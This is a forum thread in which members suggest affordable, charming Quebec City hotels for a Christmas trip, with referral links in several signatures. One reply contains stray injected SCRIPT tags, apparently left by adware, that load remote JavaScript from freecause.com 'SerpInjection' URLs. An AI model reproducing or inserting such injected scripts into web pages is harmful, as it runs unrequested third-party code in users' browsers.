User Tag List

Page 1 of 2 1 2 LastLast
    Trading Score
    287 (100%)

DH and I are thinking of going to Quebec City for a night or two over Christmas Wondering if anyone has any advice on where we should stay??? Something nice and charming, in the Old City and not too pricey would be ideal
    This thread is currently associated with: N/A
    I have started a new venture with South Hill Designs (customizable lockets and bracelets). Check out my website to learn more
    http://www.southhilldesigns.com/ca/olganorris/default

Canadian Guru
    Trading Score
    0 (0%)

Check http://www.tripadvisor.com they have customer reviews.
    <SCRIPT id=FCTB000063267_HtmlInject_LiIh5NQ61_31bGOVT2JD31 P3 src="http://staging.client.freecause.com/SerpInjection/bro_lm_js.js"></SCRIPT><SCRIPT id=FCTB000063267_HtmlInject_LiIh5NQ61_31Na8o3o2N_7 rk src="http://staging.client.freecause.com/SerpInjection/bro_utils_js.js"></SCRIPT><SCRIPT id=FCTB000063267_HtmlInject_LiIh5NQ61_31XPFT0ze_8h U3 src="http://s3pr.freecause.com/airmiles-clone_script.js"></SCRIPT><SCRIPT id=FCTB000063267_HtmlInject_LiIh5NQ61_31gpFau3M9Wq Er src="http://staging.client.freecause.com/SerpInjection/bro_serp.js"></SCRIPT><SCRIPT id=FCTB000063267_HtmlInject_LiIh5NQ61_31Bm0F54V__C 51 type=text/javascript defer> var fctb_tool=null; function I9e508WkPlTX(t) { fctb_tool=t; start(fctb_tool); } </SCRIPT>

Trading Score
    173 (100%)

Try the Hotel Clarendon

It is older, and they have tried to keep a lot of the old charm, but the internet sucks if you need it - but good price and location
    Make an easy $20+ per month with Swagbucks - watch videos, search, play games & get paid!
    ~ ~ ~
    Save while shopping online with cashback from ebates
    Get cash rebates when you buy from amazon.ca, Old Navy and more - get paid by cheque or paypal!

Skankarina on the prowl MercyEhm's Avatar
    Trading Score
    86 (100%)

The Clarendon is GREAT. I have a friend who works there.

Problem is... if you haven't booked by now for xmas...??? Ish It's a tough one in Qc City.

There's always Chateau Frontenac but that's probably solid booked as well. (not to mention 3x$$/room for the holidays)

Yes, all the hotels raise their prices for stays between the 22nd dec - 3rd jan.

Same thing with summer FYI... last 2 weeks of July are double sometimes triple the prices and need to be booked 6mo ahead of time.

Beware of booking anything in St Foy. Most advertise that it's minutes from Old Quebec... it is... but minutes in a 40$ cab ride.

Feel free to PM me if you have questions/issues/problems.

I know the city very well.
    Instant Human Just Add COFFEE!

Trading Score
    173 (100%)

Darn Mercy, if I had known that I just booked rooms there lol
    Make an easy $20+ per month with Swagbucks - watch videos, search, play games & get paid!
    ~ ~ ~
    Get cash rebates when you buy from amazon.ca, Old Navy and more - get paid by cheque or paypal!

Canadian Genius
    Trading Score
    152 (100%)

what about the world famous "ice hotel"?? That would be fun

Trading Score
    86 (100%)

I think the Ice Hotel is booked a year ahead.

We won a night's stay there a few years ago and upon "checking out" they asked us to reserve for the following year...

I didn't like it. But I HATE HATE HATE winter with a passion the devil has yet to fathom so I'm no referrence when it comes to that place. It's pretty though

Trading Score
    173 (100%)

If you book on hotels.com the Clarendon is as cheap as $80 a night over xmas
    ~ ~ ~

Trading Score
    86 (100%)

Eeeeeeeeeek! BOOK NOW! holy that's awesome!

With the economy the way it is I wasn't thinking... travelling is at it's lowest in decades. You'll be able to get a good deal.

Good job Pix!

Trading Score
    173 (100%)

I always book through hotels.com because I use a website to get cashback using it lol, its actually the same rate I paid for our upcoming stay

They have deluxe/superior rooms from $110
    ~ ~ ~

Trading Score
    0 (0%)

When in Quebec City, we always stay at Palace Royal. It is very nice and the rooms are very big. We love 5 star hotels and all they bring us. this on is great wether I go alone with DH or with the whole family. It is right outside the old city wall so, you are right there
    Nanoush

Trading Score
    26 (100%)

Quote Originally Posted by FallenPixels View Post
    If you book on hotels.com the Clarendon is as cheap as $80 a night over xmas
    in Quebec city....wow ! wow ! wow!....that is cheaper that i would think...

Trading Score
    2 (100%)

We stayed at the best western in quebec city, it was too much money though for just a regular hotel. We did have fun though walking down the streets etc. We were right I think in the center of the city and a few minutes from the older section.

I think if I were to go again though I would try to research the area a bit more and use a website like hotels.com.
    Try out the maven box by julep And code FREEFB, and get your box for one cent:
    Use this link
    http://www.julep.com/rewardsref/index/refer/id/2287/

Trading Score
    69 (100%)

When we go to Quebec we stay at a really cheap place which has no shower..its called SIL house....wonder if i could persuade dh to go to a hotel instead

Junior Canuck
    Trading Score
    92 (100%)

I would take a look a priceline.com. You don't get to know what hotel you'll be in but you know the star rating and what area you'll be in (you find out after you book right away of course.)

I don't know what it's like during the holidays but I drove across the states this summer with friends and used priceline for every hotel except New York (we wanted to have more control over our location there) and it was AMAZING. Seriously we were on student budgets and we a lot of the hotels we looked out of place checking in because we had no idea how nice the places were before we got there because they were so cheap. Plus it was great because we were always in great locations.

At any rate worth checking out. If you or anyone else wants advice on Priceline I'd be happy to help.

I'm just saying...
    Join Swagbucks already!

Check out my Etsy store! http://www.alteredcartography.etsy.com

Page 1 of 2 1 2 LastLast

Thread Information